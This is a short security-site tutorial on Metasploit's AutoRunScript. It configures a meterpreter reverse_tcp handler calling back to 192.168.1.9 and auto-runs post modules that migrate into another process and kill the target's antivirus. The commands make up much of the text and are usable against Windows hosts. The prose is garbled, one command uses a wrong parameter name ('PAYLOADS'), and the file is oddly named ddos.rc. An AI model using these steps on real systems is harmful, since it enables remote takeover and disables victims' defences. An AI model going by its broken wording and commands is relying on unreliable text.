Security and Technology

securityonline.info

In Metasploit it supports an interesting feature called AutoRunScript. This feature can enable users to specify the module operation by creating the .rc file pre-registered automatically during operation Exploit.

It can be shortened for some time on your pentest if we use these features.

How to use AutoRun on metasploit

First, create an .rc file containing the command to run automatically. For example, i created a file named ddos.rc on /root/ direcoty. This file puts the command line to perform automatically at the msf penetration.# cat /root/ddos.rc
run post/windows/manage/migrate
run post/windows/manage/killav
Now, on metasploit framework, if you choose any exploit module, you need to set AutoRunScript parameter
exploit(handler) #>set LHOST 192.168.1.9
exploit(handler) #>set LPORT 8080
exploit(handler) #>set PAYLOADS windows/meterpreter/reverse_tcp
exploit(handler) #>set AutoRunScript multi_console_command -rc /root/ddos.rc

If successful, then set Exploit ddos.rc to load the file as shown below and perform the specified command, such as migrate, killav. To maintain substantially the same time penetrate and migrate through the secure shell to keep breathing space in the memory of another process or the process to create a new connection in the target PC, this setting can be a bit easier if you pre-register as a script like this.